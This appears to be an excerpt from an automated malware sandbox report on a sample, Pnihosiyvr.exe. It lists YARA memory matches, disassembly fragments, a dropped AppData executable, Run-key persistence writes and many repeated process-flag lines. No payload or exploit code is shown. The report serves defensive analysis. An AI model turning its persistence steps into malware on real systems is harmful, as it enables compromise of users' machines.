Source: Yara match	File source: 00000008.00000002.2774836682.000001D2A98B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2325981322.000001A32CB00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pnihosiyvr.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sssssssssssssssss.exe PID: 6136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sssssssssssssssss.exe PID: 2608, type: MEMORYSTR

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Code function: 0_2_00007FF848F4D022 push eax; iretd	0_2_00007FF848F4D023
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Code function: 0_2_00007FF848F4D032 pushad ; iretd	0_2_00007FF848F4D033
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Code function: 0_2_00007FF848F400BD pushad ; iretd	0_2_00007FF848F400C1
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Code function: 0_2_00007FF849201D35 push eax; ret	0_2_00007FF849201D36
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Code function: 0_2_00007FF849201D2E push eax; ret	0_2_00007FF849201D2F
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Code function: 0_2_00007FF8492061BE push ebx; ret	0_2_00007FF8492061DA
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 8_2_00007FF848F2000A push ds; iretd	8_2_00007FF848F2002A
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 8_2_00007FF848F2D022 push eax; iretd	8_2_00007FF848F2D023
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 8_2_00007FF848F2D032 pushad ; iretd	8_2_00007FF848F2D033
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 8_2_00007FF848F200BD pushad ; iretd	8_2_00007FF848F200C1
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 11_2_00007FF848F1D022 push eax; iretd	11_2_00007FF848F1D023
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 11_2_00007FF848F1D032 pushad ; iretd	11_2_00007FF848F1D033
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 11_2_00007FF848F100BD pushad ; iretd	11_2_00007FF848F100C1
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Code function: 11_2_00007FF8491E91BC pushfd ; iretd	11_2_00007FF8491E91BD

Source: C:\Users\user\Desktop\Pnihosiyvr.exe

File created: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sssssssssssssssss			Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sssssssssssssssss			Jump to behavior

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
